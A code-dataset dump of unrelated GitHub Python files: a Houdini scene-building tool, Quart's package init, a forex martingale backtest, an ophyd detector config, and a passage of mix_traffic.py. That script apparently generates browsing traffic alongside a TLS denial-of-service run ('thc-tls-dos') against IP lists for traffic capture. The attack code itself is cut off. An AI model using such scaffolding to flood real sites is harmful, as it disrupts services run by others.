5b84c8e2df7b21d734d52b16a4f8de9d6aa1f669 | 74306310e5c235164ee27f3ea6591e7d4aa5d8c7 | /EVE/tools/createScene.py | e0134e8b7eecae1e890ac33d8cbf9734f81c6423 | [] | no_license | Kolominsky/Houdini | afaf60c15ea6abba9d46aca0f5a41d1ad39fc3c1 | 0faefdda0c86731678f5a5cd4adaab937b2dc964 | refs/heads/master | 2020-04-18T10:44:33.254304 | 2019-01-23T21:30:37 | 2019-01-23T21:30:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,772 | py | # 256 Pipeline tools
# Create ANIMATION and RENDER scenes
import hou
import os
from PySide2 import QtCore, QtUiTools, QtWidgets
from EVE.dna import dna
reload(dna)
# Get Houdini root nodes
# NOTE: `hou` is only importable inside a running Houdini session, so these
# resolve at import time within Houdini.
sceneRoot = hou.node('/obj/')
outRoot = hou.node('/out/')
class SNV(QtWidgets.QWidget):
    """'Save Next Version' warning dialog.

    Shown when the scene file about to be created already exists on disk.
    Offers three choices — save a new version (SNV), overwrite (OVR) or
    cancel — and forwards the choice to the global CS tool object.
    """

    def __init__(self, filePath, sceneType):
        super(SNV, self).__init__()
        # Remember which scene type (RND, ANM, ...) to report back to CS.
        self.sceneType = sceneType
        # Load the Qt Designer layout and parent the dialog to Houdini's
        # main window so it floats on top of it.
        uiFilePath = '{0}/saveNextVersion_Warning.ui'.format(dna.folderUI)
        self.ui = QtUiTools.QUiLoader().load(uiFilePath, parentWidget=self)
        self.setParent(hou.ui.mainQtWindow(), QtCore.Qt.Window)
        # Tell the artist which file already exists.
        warningText = 'File exists!\n{0}'.format(dna.analyzeFliePath(filePath)['fileName'])
        self.ui.lab_message.setText(warningText)
        # Wire the buttons; every choice also closes the dialog.
        self.ui.btn_SNV.clicked.connect(self.SNV)
        self.ui.btn_SNV.clicked.connect(self.close)
        self.ui.btn_OVR.clicked.connect(self.OVR)
        self.ui.btn_OVR.clicked.connect(self.close)
        self.ui.btn_ESC.clicked.connect(self.close)

    def SNV(self):
        """User chose 'save next version': delegate back to the main tool."""
        CS.createScene(self.sceneType, 'SNV')

    def OVR(self):
        """User chose 'overwrite': delegate back to the main tool."""
        CS.createScene(self.sceneType, 'OVR')
class CreateScene(QtWidgets.QWidget):
    """Main 'Create Scene' tool window.

    Creates versioned Houdini scene files for a sequence/shot and populates
    them with environment, character, material, light and render nodes based
    on shot data from the `dna` module.
    """

    def __init__(self):
        # Load the Qt Designer UI and parent it to the Houdini main window.
        super(CreateScene, self).__init__()
        ui_file = "{}/createScene_Main.ui".format(dna.folderUI)
        self.ui = QtUiTools.QUiLoader().load(ui_file, parentWidget=self)
        self.setParent(hou.ui.mainQtWindow(), QtCore.Qt.Window)
        # One button drives scene creation for the render-scene file type.
        self.ui.btn_createRenderScene.clicked.connect(lambda: self.createScene(fileType=dna.fileTypes['renderScene']))
        self.ui.btn_createRenderScene.clicked.connect(self.close)

    def createScene(self, fileType, catch=None):
        '''
        Save a new scene file and build its content.
        :param fileType: type of created scene (Render, Animation, etc.)
        :param catch: None when run for the first time from this class;
        otherwise the user's reply from the SNV dialog ('SNV' or 'OVR')
        :return:
        '''
        # Get sequence and shot from UI
        sequenceNumber = self.ui.lin_episode.text()
        shotNumber = self.ui.lin_shot.text()
        # First run: try to create version 001, or ask the user what to do
        # if a version already exists.
        if catch == None:
            # Build path to 001 version
            pathScene = dna.buildFliePath('001', fileType, sequenceNumber=sequenceNumber, shotNumber=shotNumber)
            # Start new Houdini session without saving current
            hou.hipFile.clear(suppress_save_prompt=True)
            # Check if file exists
            if not os.path.exists(pathScene):
                # Save first version if NOT EXISTS
                hou.hipFile.save(pathScene)
                hou.ui.displayMessage('File created:\n{}'.format(pathScene.split('/')[-1]))
            else:
                # If 001 version exists, get latest existing version
                pathScene = dna.buildPathLatestVersion(pathScene)
                # Run Save Next Version dialog if EXISTS; it calls back into
                # this method with catch='SNV' or 'OVR'.
                winSNV = SNV(pathScene, fileType)
                winSNV.show()
                return
        # Replies from the SNV dialog:
        elif catch == 'SNV':
            # Save latest version
            newPath = dna.buildPathNextVersion(dna.buildPathLatestVersion(dna.buildFliePath('001', fileType, sequenceNumber=sequenceNumber, shotNumber=shotNumber)))
            hou.hipFile.save(newPath)
            hou.ui.displayMessage('New version saved:\n{}'.format(newPath.split('/')[-1]))
        elif catch == 'OVR':
            # Overwrite existing file
            pathScene = dna.buildPathLatestVersion(dna.buildFliePath('001', fileType, sequenceNumber=sequenceNumber, shotNumber=shotNumber))
            hou.hipFile.save(pathScene)
            hou.ui.displayMessage('File overwited:\n{}'.format(pathScene.split('/')[-1]))
        else:
            return
        # Build scene content
        self.buildSceneContent(fileType, sequenceNumber=sequenceNumber, shotNumber=shotNumber)

    def createHDA(self, parent, hdaTypeName, hdaName):
        '''
        Create a Houdini digital asset node and pin it to the latest
        installed definition of that asset.
        :param parent: node the HDA is created inside
        :param hdaTypeName: HDA node type name
        :param hdaName: name for the created node
        :return:
        '''
        # Create HDA node inside parent container
        hda = parent.createNode(hdaTypeName, hdaName)
        # Set HDA file version (latest)
        hdaDefinitions = hda.type().allInstalledDefinitions()
        hdaPaths = [i.libraryFilePath() for i in hdaDefinitions]
        latestVersion = dna.extractLatestVersionFile(hdaPaths)  # e.g. '010'
        for i in hdaPaths:
            if latestVersion in i.split('/')[-1]:
                latestIndex = hdaPaths.index(i)
                hdaDefinitions[latestIndex].setIsPreferred(True)

    def createContainer(self, parent, name, bbox=0, mb=None, disp=1):
        '''
        Create scene container for CHARS, ENV etc
        :param parent: container node parent object (where to create it)
        :param name: container name
        :param bbox: display container content as bounding box (bbox = 2, full = 0)
        :param mb: turn on motion blur for container content geometry
        :param disp: Display container node flag (ON = 1, OFF = 0)
        :return: the created geometry container node
        '''
        CONTAINER = parent.createNode('geo', name)
        # Delete all nodes in container (geo nodes spawn a default file SOP)
        for node in CONTAINER.children():
            node.destroy()
        # Display as bounding box
        CONTAINER.parm('viewportlod').set(bbox)
        # Set display flag
        CONTAINER.setDisplayFlag(disp)
        # Turn ON motion blur
        if mb is not None:
            CONTAINER.parm('geo_velocityblur').set(1)
        return CONTAINER

    def convertPathCache(self, pathCache):
        '''
        Convert geometry cache string path (used in FileCacheSOP) to a folder
        path suitable for dna.extractLatestVersionFolder():
        expand the $JOB variable to a full path and remove the file name.
        :param pathCache: cache file path possibly containing $JOB
        :return: folder part of the expanded path
        '''
        fileName = pathCache.split('/')[-1]
        pathCacheFolder = pathCache.replace('$JOB', dna.root3D).replace(fileName, '')
        return pathCacheFolder

    def buildCharacterLoaders(self, CHARACTERS, charactersData):
        '''
        Create network to load characters data (geo cache, hairs, etc).
        TBD: merge loaders when several chars are in shot
        :param CHARACTERS: Characters container - geometry node object
        :param charactersData: dictionaries with character data linked to a shot
        :return:
        '''
        for characterData in charactersData:
            # Create a FileCache -> OUT null pair per character
            characterName = characterData['code']
            cache = CHARACTERS.createNode('filecache', 'CACHE_{0}'.format(characterName))
            cache.parm('loadfromdisk').set(1)
            null = CHARACTERS.createNode('null', 'OUT_{0}'.format(characterName))
            null.setInput(0, cache)
            # Build and set path to the 001 cache version
            pathCache = dna.buildFliePath('001',
                                          dna.fileTypes['cacheAnim'],
                                          scenePath=hou.hipFile.path(),
                                          characterName=characterName)
            cache.parm('file').set(pathCache)
            # Set render flags
            null.setDisplayFlag(1)
            null.setRenderFlag(1)
        CHARACTERS.layoutChildren()

    def importAnimation(self, scenePath, charactersData):
        '''
        Import character animation for the current render scene: set FileCache
        node paths to the latest existing cache version, e.g.
        $JOB/geo/SHOTS/010/SHOT_010/ROMA/GEO/001/E010_S010_ROMA_001.$F.bgeo.sc
        :param scenePath: Full path to Houdini render scene
        :param charactersData: list of character dicts for the current shot
        :return:
        '''
        for characterData in charactersData:
            characterName = characterData['code']
            # BUILD CACHE PATH (LATEST VERSION)
            # Build a path to the 001 version of cache
            pathCache = dna.buildFliePath('001',
                                          dna.fileTypes['cacheAnim'],
                                          scenePath=scenePath,
                                          characterName=characterName)
            # Check latest existing version, build new path if exists
            pathCacheFolder = self.convertPathCache(pathCache)
            latestCacheVersion = dna.extractLatestVersionFolder(pathCacheFolder)
            if latestCacheVersion != '001':
                pathCache = dna.buildFliePath(latestCacheVersion,
                                              dna.fileTypes['cacheAnim'],
                                              scenePath=scenePath,
                                              characterName=characterName)
            # SET FILE CACHE NODE PARAM
            # Get cache node created by buildCharacterLoaders()
            cache = hou.node('{0}/{1}/CACHE_{2}'.format(sceneRoot, dna.nameChars, characterName))
            # Set path
            cache.parm('file').set(pathCache)

    def buildSceneContent(self, fileType, sequenceNumber, shotNumber):
        '''
        Create scene content: import characters, environments, materials etc.
        :param fileType: scene file type (only render scenes are handled)
        :param sequenceNumber: episode/sequence string from the UI
        :param shotNumber: shot string from the UI
        :return:
        '''
        # Create Render scene
        if fileType == dna.fileTypes['renderScene']:
            # Get shot data
            shotData, assetsData, environmentData, charactersData = dna.getShotGenes(sequenceNumber, shotNumber)
            # Initialize scene
            scenePath = hou.hipFile.path()
            # BUILD ENVIRONMENT
            # Proxy
            ENV_PRX = self.createContainer(sceneRoot, dna.nameEnvProxy)
            self.createHDA(ENV_PRX, environmentData['proxy_hda']['hda_name'], environmentData['proxy_hda']['name'])
            ENV_PRX.setPosition([0, 0])
            # Base
            ENVIRONMENT = self.createContainer(sceneRoot, dna.nameEnv, bbox=2, disp=0)
            self.createHDA(ENVIRONMENT, environmentData['hda_name'], environmentData['code'])
            ENVIRONMENT.setPosition([0, -dna.nodeDistance_y])
            # Animation
            ENV_ANM = self.createContainer(sceneRoot, dna.nameEnvAnim, bbox=2, mb=1)
            self.createHDA(ENV_ANM, environmentData['animation_hda']['hda_name'], environmentData['animation_hda']['name'])
            ENV_ANM.setPosition([0, -2 * dna.nodeDistance_y])
            # Crowds
            CROWDS = self.createContainer(sceneRoot, dna.nameCrowds, bbox=2, mb=1)
            self.createHDA(CROWDS, environmentData['crowds_hda']['hda_name'], environmentData['crowds_hda']['name'])
            CROWDS.setPosition([0, -3 * dna.nodeDistance_y])
            # BUILD CHARACTERS
            # Create characters container
            CHARACTERS = self.createContainer(sceneRoot, dna.nameChars, mb=1)
            CHARACTERS.setPosition([0, -4 * dna.nodeDistance_y])
            # Create nodes to pull character caches
            self.buildCharacterLoaders(CHARACTERS, charactersData)
            # IMPORT MATERIALS
            # Create Geometry node in scene root
            ML = sceneRoot.createNode('ml_general', dna.nameMats)
            ML.setPosition([dna.nodeDistance_x, 0])
            # IMPORT ENV LIGHTS
            LIT = sceneRoot.createNode(environmentData['light_hda']['hda_name'], environmentData['light_hda']['name'])
            LIT.setPosition([dna.nodeDistance_x, -dna.nodeDistance_y])
            # SETUP OUTPUT
            # Create mantra render node
            mantra = outRoot.createNode('ifd', 'RENDER')
            # Render file version setup, e.g.
            # renderFile = '$JOB/render/010/SHOT_040/001/E010_S040_001.$F.exr'
            renderFile = dna.buildFliePath('001', dna.fileTypes['renderFile'], scenePath=scenePath)
            fileLocation = dna.analyzeFliePath(renderFile)['fileLocation']
            if not os.path.exists(fileLocation):
                # Make 001 folder
                os.makedirs(fileLocation)
            else:
                # If 001 exists, bump to the next version folder
                latestVersion = dna.extractLatestVersionFolder(fileLocation)
                nextVersion = '{:03d}'.format(int(latestVersion) + 1)
                renderFile = dna.buildFliePath(nextVersion, dna.fileTypes['renderFile'], scenePath=scenePath)
                os.makedirs(dna.analyzeFliePath(renderFile)['fileLocation'])
            # Localize path (add $JOB)
            renderFile = renderFile.replace(dna.root3D, '$JOB')
            # Setup Mantra parameters
            mantra.parm('vm_picture').set(renderFile)
            mantra.parm('camera').set('/obj/E{0}_S{1}'.format(sequenceNumber, shotNumber))
            # Set common parameters from preset
            # NOTE: iteritems() means this module targets Python 2 (Houdini's
            # bundled interpreter at the time).
            for param, value in dna.renderSettings['common'].iteritems():
                mantra.parm(param).set(value)
            # Set DRAFT parameters
            for param, value in dna.renderSettings['draft'].iteritems():
                mantra.parm(param).set(value)
            # SETUP SCENE (end frame ...)
            frameEnd = shotData['sg_cut_out']
            hou.playbar.setFrameRange(dna.frameStart, frameEnd)
            hou.playbar.setPlaybackRange(dna.frameStart, frameEnd)
            # IMPORT ANIMATION
            # Import characters caches
            self.importAnimation(scenePath, charactersData)
            # Save scene
            hou.hipFile.save()
# Create CS object
# Single shared tool instance; the SNV dialog's callbacks reference this
# global to report the user's choice.
CS = CreateScene()


def run():
    # Entry point used by the Houdini shelf tool: show the Create Scene UI.
    CS.show()
"KKO8@dsone.3ds.com"
] | KKO8@dsone.3ds.com |
1e5122dc89c65f5bcead30da6a84115a1b6723ee | 94f978c65b6368f936e18364cc477591094750f5 | /quart/__init__.py | c7fa2b897ed9969c7681fd2a6aa8a28fd1fd4750 | [
"MIT"
] | permissive | tharvik/quart | 2a4ff330dd384dc9f917b179e8d247808e7ccd6c | 038680bcc1c0966481d73bdbe474f55a3ce104f4 | refs/heads/master | 2021-04-18T21:54:18.339532 | 2018-03-06T08:06:33 | 2018-03-06T08:11:48 | 126,790,492 | 0 | 0 | null | 2018-03-26T07:29:58 | 2018-03-26T07:29:58 | null | UTF-8 | Python | false | false | 2,082 | py | from jinja2 import escape, Markup
from .__about__ import __version__
from .app import Quart
from .blueprints import Blueprint
from .config import Config
from .ctx import (
after_this_request, copy_current_request_context, copy_current_websocket_context,
has_app_context, has_request_context, has_websocket_context,
)
from .exceptions import abort
from .globals import (
_app_ctx_stack, _request_ctx_stack, _websocket_ctx_stack, current_app, g, request, session,
websocket,
)
from .helpers import (
flash, get_flashed_messages, get_template_attribute, make_response, stream_with_context,
url_for,
)
from .json import jsonify
from .signals import (
appcontext_popped, appcontext_pushed, appcontext_tearing_down, before_render_template,
got_request_exception, message_flashed, request_finished, request_started,
request_tearing_down, signals_available, template_rendered,
)
from .static import safe_join, send_file, send_from_directory
from .templating import render_template, render_template_string
from .typing import ResponseReturnValue
from .utils import redirect
from .wrappers import Request, Response
__all__ = (
'__version__', '_app_ctx_stack', '_request_ctx_stack', '_websocket_ctx_stack', 'abort',
'after_this_request', 'appcontext_popped', 'appcontext_pushed', 'appcontext_tearing_down',
'before_render_template', 'Blueprint', 'Config', 'copy_current_request_context',
'copy_current_websocket_context', 'current_app', 'escape', 'flash', 'g',
'get_flashed_messages', 'get_template_attribute', 'got_request_exception', 'has_app_context',
'has_request_context', 'has_websocket_context', 'htmlsafe_dumps', 'jsonify', 'make_response',
'Markup', 'message_flashed', 'Quart', 'redirect', 'render_template', 'render_template_string',
'request', 'Request', 'request_finished', 'request_started', 'request_tearing_down',
'Response', 'ResponseReturnValue', 'safe_join', 'send_file', 'send_from_directory', 'session',
'signals_available', 'stream_with_context', 'template_rendered', 'url_for', 'websocket',
)
| [
"philip.graham.jones@googlemail.com"
] | philip.graham.jones@googlemail.com |
9a595b0c0afd43784fd25b50fbdf0f7538d47de5 | a7780057b446fefea67ba98de074b543216b69df | /version1_antimart.py | d282b875ffbd3e23d131a8f87862a292f28228cd | [] | no_license | kgodonoghue/FX_2020 | a8101876186b16d3fd06f0fc81bdd68d34aad0ae | f97432f68773bef23d3065e2ff5b7ef14a333e55 | refs/heads/master | 2022-04-27T07:31:41.905412 | 2020-04-18T16:04:16 | 2020-04-18T16:04:16 | 254,858,222 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,385 | py | # -*- coding: utf-8 -*-
"""
Created on Wed Oct 2 18:26:16 2019
@author: kgodo
# counter added and time after the limit hit
"""
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.metrics import classification_report
from pandas import DataFrame, read_csv
import time
import matplotlib.pyplot as plt
from math import *
from random import randint
from sklearn.preprocessing import MinMaxScaler
import datetime
import time
from pandas_ml import ConfusionMatrix
from sklearn.tree import DecisionTreeRegressor
from sklearn import preprocessing
from sklearn.ensemble import RandomForestRegressor
from sklearn.metrics import confusion_matrix
import numpy as np
buy_counter=[]
def martFuncBuy(data, cost, SL, TP, multiplier, martSteps, factor, capital, pipBet, startPoint, martLimit, tick_count_limit, sample):
    """Simulate the anti-martingale BUY leg over a tick price series.

    Returns a tuple ``(profit_array, streak_log)`` where ``profit_array`` is
    the per-tick profit (scaled by ``pipBet``) and ``streak_log`` records the
    martingale streak length each time a sequence closed out.
    ``capital`` is accepted for interface compatibility but not used here.
    """
    streak_log = []
    # Convert pip-denominated thresholds into price units.
    stop_loss = SL / factor
    take_profit = TP / factor
    spread = cost / factor
    # Sized to the *unsampled* series length (as in the original design);
    # trailing entries simply stay zero when sample > 1.
    profits = np.zeros(len(data))
    anchor = 1        # index the current position was anchored at
    lot = -1          # signed position size (grows by `multiplier` on losses)
    streak = 1        # current martingale step count
    prices = np.array(data)[1::sample]
    paused = 0        # 1 while trading is suspended after hitting martLimit
    ticks_paused = 0
    for idx in range(startPoint, len(prices)):
        # While paused, just count ticks until the pause window elapses.
        if paused == 1:
            ticks_paused += 1
            if ticks_paused > tick_count_limit:
                ticks_paused = 0
                paused = 0
            continue
        move = prices[idx] - prices[anchor]
        step = prices[idx] - prices[idx - 1]
        if move > take_profit and streak > martSteps:
            # Winning close-out: log the streak and restart.
            streak_log.append(streak)
            streak = 1
            profits[idx] = lot * step + lot * spread
            lot = -1
            anchor = idx
        elif streak == martLimit:
            # Hit the martingale cap: close out and pause trading.
            streak_log.append(streak)
            streak = 1
            profits[idx] = lot * step + lot * spread
            lot = -1
            anchor = idx
            paused = 1
        elif move > take_profit:
            # Take-profit before the streak threshold: reset silently.
            streak = 1
            lot = -1
            anchor = idx
        elif move < -stop_loss and streak > martSteps:
            # Losing step while live: book the loss and scale the lot up.
            streak += 1
            profits[idx] = lot * step + lot * spread
            anchor = idx
            lot = lot * multiplier
        elif move < -stop_loss:
            # Losing step before the streak threshold: re-anchor only.
            streak += 1
            anchor = idx
            lot = -1
        elif streak > martSteps:
            # Mark-to-market drift while a position is live (no spread cost).
            profits[idx] = lot * step
    return pipBet * profits, streak_log
def martFuncSell(data, cost, SL, TP, multiplier, martSteps, factor, capital, pipBet, startPoint, martLimit, tick_count_limit, sample):
    """Simulate the anti-martingale SELL leg over a tick price series.

    Mirror image of martFuncBuy(): profits on downward moves. Returns a
    tuple ``(profit_array, streak_log)``; ``capital`` is accepted for
    interface compatibility but not used here.
    """
    streak_log = []
    # Convert pip-denominated thresholds into price units.
    stop_loss = SL / factor
    take_profit = TP / factor
    spread = cost / factor
    # Sized to the *unsampled* series length; trailing entries stay zero
    # when sample > 1.
    profits = np.zeros(len(data))
    anchor = 1        # index the current position was anchored at
    lot = 1           # signed position size (grows by `multiplier` on losses)
    streak = 1        # current martingale step count
    prices = np.array(data)[1::sample]
    paused = 0        # 1 while trading is suspended after hitting martLimit
    ticks_paused = 0
    for idx in range(startPoint, len(prices)):
        # While paused, just count ticks until the pause window elapses.
        if paused == 1:
            ticks_paused += 1
            if ticks_paused > tick_count_limit:
                ticks_paused = 0
                paused = 0
            continue
        move = prices[idx] - prices[anchor]
        step = prices[idx] - prices[idx - 1]
        if move < -take_profit and streak > martSteps:
            # Winning close-out (price fell): log the streak and restart.
            streak_log.append(streak)
            streak = 1
            profits[idx] = lot * step - lot * spread
            lot = 1
            anchor = idx
        elif streak == martLimit:
            # Hit the martingale cap: close out and pause trading.
            streak_log.append(streak)
            streak = 1
            profits[idx] = lot * step - lot * spread
            lot = 1
            anchor = idx
            paused = 1
        elif move < -take_profit:
            # Take-profit before the streak threshold: reset silently.
            streak = 1
            lot = 1
            anchor = idx
        elif move > stop_loss and streak > martSteps:
            # Losing step while live: book the loss and scale the lot up.
            streak += 1
            profits[idx] = lot * step - lot * spread
            anchor = idx
            lot = lot * multiplier
        elif move > stop_loss:
            # Losing step before the streak threshold: re-anchor only.
            streak += 1
            anchor = idx
            lot = 1
        elif streak > martSteps:
            # Mark-to-market drift while a position is live (no spread cost).
            profits[idx] = lot * step
    return pipBet * profits, streak_log
# --- Strategy / data configuration ------------------------------------------
#currency='USDMXN'
currency='usdjpy'
#currency='XAUUSD'
#currency='BITCOIN'
year_start=2015
year_stop=2021
path_data =r'E:/trading/data/' + currency + '/'  # tick-data folder (Windows drive)
SL=20                  # stop-loss, in pips
TP=20                  # take-profit, in pips
commision=0.00005      # broker commission added to the observed spread
multiplier=2           # martingale lot multiplier on losing steps
martSteps=0            # streak length before profits start being booked
capital=1000000        # starting capital (used only as a plot offset)
pipBet=2000            # profit scaling factor applied per pip
startPoint=1           # first sample index fed to the simulators
tick_count_limit=0     # pause length (in ticks) after hitting martLimit
sample=1               # tick subsampling stride
year_result=[]         # per-year summary rows collected below

if __name__ == '__main__' :
    # Sweep the martingale cap (currently a single value) across all years.
    for martLimit in range(11,12):
        for year in range(year_start,year_stop):
            print(year)
            data = pd.read_csv(path_data + str(currency) + str(year) + '.csv')
            # Average bid/ask spread plus commission = round-trip cost.
            cost=abs(data['Ask']-data['Bid']).mean()+commision
            data = data['Ask']
            # Infer the pip scaling factor from the price magnitude.
            factor=data[1]/100
            if factor<0.2:
                factor=10000
            elif factor<2:
                factor=100
            else:
                factor=1
            #sentiment = data['AskVolume']- data['BidVolume']
            #sentiment=sentiment.rolling(window=1000).mean()
            [profitArrayBuy,buy_counter]=martFuncBuy(data,cost,SL,TP,multiplier,martSteps,factor,capital,pipBet,startPoint,martLimit,tick_count_limit,sample)
            [profitArraySell,sell_counter]=martFuncSell(data,cost,SL,TP,multiplier,martSteps,factor,capital,pipBet,startPoint,martLimit,tick_count_limit,sample)
            profitArrayBuy=np.cumsum(profitArrayBuy)
            profitArraySell=np.cumsum(profitArraySell)
            # Row layout: [limit, pause, year, buy P/L, sell P/L, combined P/L]
            year_result.append([martLimit,tick_count_limit,year,profitArrayBuy[len(profitArrayBuy)-1],profitArraySell[len(profitArraySell)-1],profitArrayBuy[len(profitArrayBuy)-1]+profitArraySell[len(profitArraySell)-1]])
            # Equity curve for this year, offset by starting capital.
            plt.plot((profitArrayBuy+profitArraySell)+capital)
"noreply@github.com"
] | kgodonoghue.noreply@github.com |
9cebfe78ac4726d95ef3d85151f40b31288a7c66 | 71962596a0693e03e19257f1beb3bdda223ed4ff | /profile_xf05id1/startup/80-areadetectors.py | 606dcb874953ff5d84513d47929ed37814781b3f | [
"BSD-2-Clause"
] | permissive | tacaswell/ipython_srx | 53561979f27a108063f4851ea314073768098cbb | e3dbb45cfd87c166878e8420654cc7995f772eda | refs/heads/master | 2020-12-25T00:19:11.936763 | 2016-02-18T00:30:51 | 2016-02-18T00:30:51 | 51,659,688 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,649 | py | from ophyd.areadetector import (AreaDetector, ImagePlugin,
TIFFPlugin, StatsPlugin, HDF5Plugin,
ProcessPlugin)
from ophyd.areadetector.cam import AreaDetectorCam
from ophyd.device import BlueskyInterface
from ophyd.areadetector.trigger_mixins import SingleTrigger
from ophyd.areadetector.filestore_mixins import (FileStoreIterativeWrite,
FileStoreHDF5IterativeWrite,
FileStoreTIFFSquashing,
FileStoreTIFF)
from ophyd import Signal
from ophyd import Component as C
class SRXTIFFPlugin(TIFFPlugin, FileStoreTIFF,
                    FileStoreIterativeWrite):
    """TIFF file plugin combined with filestore iterative-write mixins."""
    pass
class BPMCam(SingleTrigger, AreaDetector):
    """Beam-position-monitor area detector with TIFF output and ROI stats.

    Components mirror the EPICS plugin chain of the BPM camera IOC.
    """
    cam = C(AreaDetectorCam, '')
    image = C(ImagePlugin, 'image1:')
    # Fixed date in the write path; the templated form is kept below for
    # when per-day folders are wanted again.
    tiff = C(SRXTIFFPlugin, 'TIFF1:',
             write_path_template='/epicsdata/bpm1-cam1/2016/2/17/')
    # write_path_template='/epicsdata/bpm1-cam1/%Y/%m/%d/')
    stats1 = C(StatsPlugin, 'Stats1:')
    stats2 = C(StatsPlugin, 'Stats2:')
    stats3 = C(StatsPlugin, 'Stats3:')
    stats4 = C(StatsPlugin, 'Stats4:')
    # this is flakey?
    # stats5 = C(StatsPlugin, 'Stats5:')
    # (removed a redundant trailing `pass`; the class already has a body)
# Instantiate the BPM camera against its EPICS PV prefix and trim what gets
# read per trigger: the TIFF resource plus the total counts of each stats ROI.
bpmAD = BPMCam('XF:05IDA-BI:1{BPM:1-Cam:1}', name='bpmAD', read_attrs=['tiff'])
bpmAD.read_attrs = ['tiff', 'stats1', 'stats2', 'stats3', 'stats4']
bpmAD.tiff.read_attrs = []
bpmAD.stats1.read_attrs = ['total']
bpmAD.stats2.read_attrs = ['total']
bpmAD.stats3.read_attrs = ['total']
bpmAD.stats4.read_attrs = ['total']
| [
"xf05id1@xf05id1-ws2.cs.nsls2.local"
] | xf05id1@xf05id1-ws2.cs.nsls2.local |
8463f1d6308fa2292d9dfa2ea550c1529e9d3cd5 | 1c3c155f39573ca9b382bc2520dde359cc6f8fe6 | /mix_traffic.py | 0480d3f061e9e726c1ed9516f74c19b851135496 | [] | no_license | zxyap/mix_traffic_collection | 885a60a3f30783d05124e26eb7ddc97fc6ecbf5d | 14f34dec56226ca2ed1ac6c29cb5f155cb9420e1 | refs/heads/master | 2022-12-11T10:02:19.215427 | 2019-10-03T13:35:04 | 2019-10-03T13:35:04 | 211,783,201 | 0 | 0 | null | 2022-12-08T06:39:30 | 2019-09-30T05:38:15 | Python | UTF-8 | Python | false | false | 14,711 | py | import os
from selenium import webdriver
import subprocess
import datetime
import logging
import socket
import random
from fake_useragent import UserAgent
import time
from urllib.request import Request, urlopen
import urllib.error
import argparse
from bs4 import BeautifulSoup
import sys
from selenium.common.exceptions import InvalidArgumentException
import pandas as pd
import numpy as np
from selenium.common.exceptions import TimeoutException
from selenium.common.exceptions import InvalidSessionIdException
from selenium.common.exceptions import UnexpectedAlertPresentException
from selenium.common.exceptions import SessionNotCreatedException
from selenium.common.exceptions import WebDriverException
import http.client
import ssl
import psutil
import requests
from requests import HTTPError
from requests import Timeout
from requests import RequestException
import threading
#global variable
isAttacking = 1;
isNormal = 0;
excel_dir = "./report_unique_normal.xlsx"
excel_dir_dos = "./report_unique_dos.xlsx"
print("Reading from excel file now for the list of sites to test...")
df = pd.read_excel(excel_dir, sheet_name="complete_list")
df_dos = pd.read_excel(excel_dir_dos, sheet_name="thc-tls-dos")
dictionary = {}
dictionary_dos = {}
ip_list_normal = df['IP']
ip_list_dos = df_dos['IP']
ua = UserAgent()
length = 0
def clean_domain(url):
    """Strip the URL scheme and any path, returning just the host part.

    Fix: the old version tested ``"https://" in url`` (a substring check)
    but then sliced a fixed prefix length, corrupting URLs where the scheme
    string appears mid-URL; now the scheme is matched as a prefix.
    """
    if url.startswith("https://"):
        result = url[8:]
    elif url.startswith("http://"):
        result = url[7:]
    else:
        result = url
    # Drop anything after the first slash (path, query, fragment).
    if "/" in result:
        result = result.split("/")[0]
    return result
def normal(ip):
    """Generate benign browsing traffic against the host at `ip`.

    Runs in its own thread until the module-global `isAttacking` flag is
    cleared by attack(). Relies on module globals: `dictionary` (ip -> domain),
    `ua` (User-Agent generator), `isNormal`, and `sts` — the tshark capture
    subprocess created in the __main__ block.
    NOTE(review): `sts` is not defined in this function; it must exist as a
    global before this thread starts — confirm.
    """
    # Finding the chromedriver path to start selenium web driver
    cdPath = "chromedriver"
    chromeDriverPath = os.path.abspath(cdPath)
    while isAttacking == 1:
        options = webdriver.ChromeOptions()
        options.add_argument('--ignore-certificate-errors')
        options.add_argument('--ignore-certificate-errors-spki-list')
        options.add_argument('--ignore-ssl-errors')
        options.add_argument('--no-sandbox')
        options.add_argument('--headless')
        options.add_argument('--disable-dev-shm-usage')
        try:
            driver = webdriver.Chrome(chromeDriverPath, options=options)
        except SessionNotCreatedException as snce:
            logging.exception(str(snce) + " session failed to create")
            # NOTE(review): if Chrome failed to start, `driver` stays unbound
            # and the next statement raises NameError — confirm intended.
            pass
        # Setting a timeout for the page load to hasten the process
        driver.set_page_load_timeout(time_to_wait=30)
        # Getting domain
        domain = dictionary[ip]
        print("testing " + domain)
        # Check if website has http
        if domain[0:7] != "http://":
            # appending https:// for urllib
            domain_urllib = "https://" + domain
        else:
            domain_urllib = domain
        print(domain_urllib)
        headers = {'User-Agent': ua.random}  # NOTE(review): unused; Request below builds its own
        req = Request(
            domain_urllib,
            headers={'User-Agent': ua.random}
        )
        # Trying to open the URL to scrape HTML
        try:
            resp = urlopen(req).read()
        except urllib.error.HTTPError as httpe:
            logging.error(str(httpe) + " for " + domain_urllib)
            continue
        except urllib.error.URLError as urle:
            logging.error(str(urle) + " for " + domain_urllib)
            continue
        except TimeoutError as toe:
            logging.error(str(toe) + " for " + domain_urllib)
            continue
        except http.client.HTTPException as httpexcep:
            logging.error(str(httpexcep) + " for " + domain_urllib)
            continue
        except ssl.CertificateError as sslCE:
            logging.error(str(sslCE) + " for " + domain_urllib)
            continue
        except ConnectionResetError as cre:
            logging.error(str(cre) + " for " + domain_urllib)
            continue
        except UnicodeEncodeError as uee:
            logging.error(str(uee) + " for " + domain_urllib)
            continue
        except ValueError as ve:
            logging.error(str(ve) + " for " + domain_urllib)
            continue
        # Collect candidate hrefs from the landing page, skipping
        # javascript/anchor pseudo-links.
        soup = BeautifulSoup(resp, "html.parser")
        cleanLinks = []
        for link in soup.find_all('a', href=True):
            if "javascript" not in link or "#" not in link:
                cleanLinks.append(link["href"])
        try:
            driver.get(domain_urllib)
        except TimeoutException as toe:
            print("Timeout, moving onto next site")
            logging.exception(str(toe) + " for " + domain_urllib)
            pass
        except InvalidSessionIdException as isie:
            print("Invalid session id, moving on to the next site")
            logging.exception(str(isie) + " for " + domain_urllib)
            pass
        # This polls for the return code of the tshark process; the counter
        # is pinned to 1 below, so only tshark's exit (or the attack flag)
        # ends the loop.
        count = 0
        timeout = 50
        # Signal the attack thread that normal traffic has started.
        global isNormal
        isNormal = 1
